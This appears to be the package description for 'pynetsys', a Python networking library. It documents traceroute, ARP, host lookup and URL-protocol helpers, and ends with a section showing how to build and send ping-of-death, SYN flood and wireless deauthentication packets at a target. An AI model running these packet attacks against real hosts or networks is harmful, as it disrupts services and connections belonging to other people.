pynetsys is a collection of tools and malicious packets.
Project description
PYNETSYS
pynetsys is a collection of tools and malicious packets.
Developed by Andrea Vaccaro from ANDRVV (c) 2022
Installing
Linux, MacOS = pip3 install pynetsys --user
Windows = pip install pynetsys --user
Tools
import pynetsys
trace = pynetsys.tool.traceroute("python.org") --> list
print(trace)
arping = pynetsys.tool.arp() --> dict
print(arping)
hostinfo = pynetsys.tool.hostlookup("python.org") --> dict
print(hostinfo)
networks = pynetsys.tool.networkFinder() --> dict
print(hostinfo)
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isonline = pynetsys.isOnline("python.org") --> bool
print(isonline)
haswebprotocol = pynetsys.hasWebProtocol("http:\\python.org") --> bool
OR
haswebprotocol = pynetsys.hasWebProtocol("python.org") --> bool
print(haswebprotocol)
hasSSLwebprotocol = pynetsys.hasSSLWebProtocol("https:\\python.org") --> bool
OR
hasSSLwebprotocol = pynetsys.hasSSLWebProtocol("python.org") --> bool
print(hasSSLwebprotocol)
addwebprotocol = pynetsys.addWebProtocol("python.org") --> bool
print(addwebprotocol)
removewebprotocol = pynetsys.removeWebProtocol("https:\\python.org") --> bool
OR
removewebprotocol = pynetsys.removeWebProtocol("http:\\python.org") --> bool
print(removewebprotocol)
Create malicious packet and send
import pynetsys
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.DEATH_PING)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.SYN_FLOOD)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "aa:bb:cc:dd:ee:ff", attack = Packets.WIRELESS_DEAUTH)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
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